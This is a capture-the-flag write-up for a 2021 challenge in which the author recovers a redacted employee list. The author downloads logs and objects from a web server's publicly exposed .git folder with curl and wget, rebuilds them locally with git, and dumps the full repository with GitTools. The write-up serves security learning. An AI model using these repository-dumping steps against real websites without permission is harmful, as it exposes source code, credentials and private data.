# Meet the Team ```md Recover the list of employees working at CONSTELLATIONS. With the flag of this challenge, you should find new information that will help with future challenges. You should find the flag for this challenge ON THIS constellations.page website. You will not find it on GitHub. HINT: "Can we please stop sharing our version control software out on our website?" HINT AGAIN: you are looking for a _publicly accessible version control software folder published on_ the constellations.page website itself After solving this challenge, you may need to refresh the page to see the newly unlocked challenges. ``` Well, at this point I know about the `/.git/` folder, and the commit message clearly says something was removed. This could be confirmed by visiting [constellations.page/meet-the-team.html](https://constellations.page/meet-the- team.html) as it will give a message saying that info was redacted. ## Snooping around .git/logs ``` $ curl -v 34.117.193.93:80/.git/logs/HEAD * Trying 34.117.193.93:80... * Connected to 34.117.193.93 (34.117.193.93) port 80 (#0) > GET /.git/logs/HEAD HTTP/1.1 > Host: 34.117.193.93 > User-Agent: curl/7.74.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Sat, 13 Mar 2021 14:04:12 GMT < Server: Apache/2.4.25 (Debian) < Last-Modified: Wed, 24 Feb 2021 00:20:18 GMT < ETag: "799-5bc09ffecf480" < Accept-Ranges: bytes < Content-Length: 1945 < Via: 1.1 google < 0000000000000000000000000000000000000000 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a Leo Rison <[email protected]> 1614124430 -0500 commit (initial): Added initial assets and landing page 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a 87b17a86409582c162e260795afdf104dc1d46b1 Leo Rison <[email protected]> 1614124968 -0500 commit: Added the Meet The Team page 87b17a86409582c162e260795afdf104dc1d46b1 8e9e7afad5d1f7c6c3dcf322a3a94aeebc1e0073 Leo Rison <[email protected]> 1614125173 -0500 commit: Management said I need to remove the team details so I redacted that page and added it to robots.txt 8e9e7afad5d1f7c6c3dcf322a3a94aeebc1e0073 87b17a86409582c162e260795afdf104dc1d46b1 Leo Rison <[email protected]> 1614125488 -0500 checkout: moving from master to 87b17a 87b17a86409582c162e260795afdf104dc1d46b1 0780dea9ede681b1e4276d74740bb11056d97c39 Leo Rison <[email protected]> 1614125881 -0500 commit: Management said I need to remove the team details so I redacted that page and added it to robots.txt 0780dea9ede681b1e4276d74740bb11056d97c39 87b17a86409582c162e260795afdf104dc1d46b1 Leo Rison <[email protected]> 1614125918 -0500 checkout: moving from 0780dea9ede681b1e4276d74740bb11056d97c39 to 87b17a86409582c162e260795afdf104dc1d46b1 87b17a86409582c162e260795afdf104dc1d46b1 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a Leo Rison <[email protected]> 1614125954 -0500 checkout: moving from 87b17a86409582c162e260795afdf104dc1d46b1 to 1142cc 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a 4c88ac1c56fe228267cf415c3ef87d7c3b8abd60 Leo Rison <[email protected]> 1614125972 -0500 commit: Added the Meet The Team page 4c88ac1c56fe228267cf415c3ef87d7c3b8abd60 e7d4663ac6b436f95684c8bfc428cef0d7731455 Leo Rison <[email protected]> 1614126014 -0500 commit: Management said I need to remove the team details so I redacted that page and added it to robots.txt * Connection #0 to host 34.117.193.93 left intact ``` ``` $ curl -v 34.117.193.93:80/.git/logs/refs/heads/master * Trying 34.117.193.93:80... * Connected to 34.117.193.93 (34.117.193.93) port 80 (#0) > GET /.git/logs/refs/heads/master HTTP/1.1 > Host: 34.117.193.93 > User-Agent: curl/7.74.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Sat, 13 Mar 2021 14:13:07 GMT < Server: Apache/2.4.25 (Debian) < Last-Modified: Wed, 24 Feb 2021 00:06:36 GMT < ETag: "271-5bc09ceee3b00" < Accept-Ranges: bytes < Content-Length: 625 < Via: 1.1 google < 0000000000000000000000000000000000000000 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a Leo Rison <[email protected]> 1614124430 -0500 commit (initial): Added initial assets and landing page 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a 87b17a86409582c162e260795afdf104dc1d46b1 Leo Rison <[email protected]> 1614124968 -0500 commit: Added the Meet The Team page 87b17a86409582c162e260795afdf104dc1d46b1 8e9e7afad5d1f7c6c3dcf322a3a94aeebc1e0073 Leo Rison <[email protected]> 1614125173 -0500 commit: Management said I need to remove the team details so I redacted that page and added it to robots.txt * Connection #0 to host 34.117.193.93 left intact ``` Every-time you create a file, and track it, git compresses it and stores it into its own data structure. The compressed object will have a unique name, a hash, and will be stored under the object directory. And according to the [Git documentation](https://git-scm.com/book/en/v2/Git-Internals-Git-Objects), each commit should give three different object files; the `commit`, the `tree` and the `blob`. Above, we can see the hashes for each commit, and if the hash of a file is `87b17a86409582c162e260795afdf104dc1d46b1`, git will store it in the `.git/objects/87` folder under the file name `b17a86409582c162e260795afdf104dc1d46b1`. The `commit` hash `87b17a...` is the one that seems it might have the full meet_the_team.html file in it, so grabbing the object file with wget ``` $ wget 34.117.193.93:80/.git/objects/87/b17a86409582c162e260795afdf104dc1d46b1 \--2021-03-13 14:36:33-- http://34.117.193.93/.git/objects/87/b17a86409582c162e260795afdf104dc1d46b1 Connecting to 34.117.193.93:80... connected. HTTP request sent, awaiting response... 200 OK Length: 177 Saving to: ‘b17a86409582c162e260795afdf104dc1d46b1’ b17a86409582c162e260795afdf104dc1d46b1 100% 2021-03-13 14:36:34 (36.7 MB/s) - ‘b17a86409582c162e260795afdf104dc1d46b1’ saved [177/177] ``` At this point, it turned out the best thing to do was to init a new git repo locally, and start rebuilding the file-structure from the target host. ``` $ git init $ cd .git/objects $ mkdir 87 && cd 87/ $ wget 34.117.193.93:80/.git/objects/87/b17a86409582c162e260795afdf104dc1d46b1 ``` This should leave me with the commit hash in the folder that git would expect, and I can now try using the build-in git tools to have a look: ``` $ git cat-file -p 87b17 tree e4b05dc6b28a9c9a023c8bf998ce548a125dbcad parent 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a author Leo Rison <[email protected]> 1614124968 -0500 committer Leo Rison <[email protected]> 1614124968 -0500 ``` Perfect, we now know the `tree`hash is `e4b05dc6b28a9c9a023c8bf998ce548a125dbcad`, so time to recreate its folder inside of `.git/objects` and see whats inside ``` $ mkdir e4 && cd e4/ $ wget 34.117.193.93:80/.git/objects/e4/b05dc6b28a9c9a023c8bf998ce548a125dbcad $ git cat-file -p e4b05 040000 tree 71f61d1666dcbd3e8e63f9b1c2e3cd9a6465fe65 assets 100644 blob 7b74d5ec40c3014c2be272f1a9d1e1896f3f56a4 index.html 100644 blob aa133c2b96c58dc78f775cc02632a9a4685e8b46 meet-the-team.html ``` And there we have our `blob` hashes! Now it is time to finally get that `meet- the-team.html` file I am after ``` $ mkdir aa && cd aa/ $ wget 34.117.193.93:80/.git/objects/aa/133c2b96c58dc78f775cc02632a9a4685e8b46 $ git cat-file -p aa133 > meet-the-team.html $ cat meet-the-team.html ``` This gives us no flags ?, but gives us a list of some interesting employees! ## GitTools Ok, so it seems like it is time to try something different... Let see if we can't just dump out the whole git repository using [GitTools](https://github.com/internetwache/GitTools). Using the `Dumper` and the `Extractor` to get as much as possible from the `.git/`-folder: ``` $ mkdir git-dump && cd git-dump $ ./gitdumper.sh https://constellations.page/.git/ ./ .. $ ./extractor.sh ./ processed-repo ``` It turns out I did not really need to do the extraction step (or much else of the above for that matter!!) - but I was curious. At this point, we can view the complete change-log for the repo. And yes - if we check the latest commit via `git show` or some GUI maybe - we get the flag if we look at the diff! **I could have gotten this flag so much earlier had I either looked for some tool to extract `.git` directories sooner - or looked at either _the correct version_ of meet-the-team.html or the commit logs before! But I got there in the end ?** ## Employee List \- Orion Morra — Support \- Lyra Patte — Marketing \- Leo Rison — Development \- Gemini Coley — Operations \- Hercules Scoxland — Sales \- Vela Leray — Management \- Pavo Welly — HR \- Gus Rodry — AccountingSee url Original writeup (https://thomaspreece.com/2021/03/15/nathamcon- ctf-2021/#9-meet-the-team).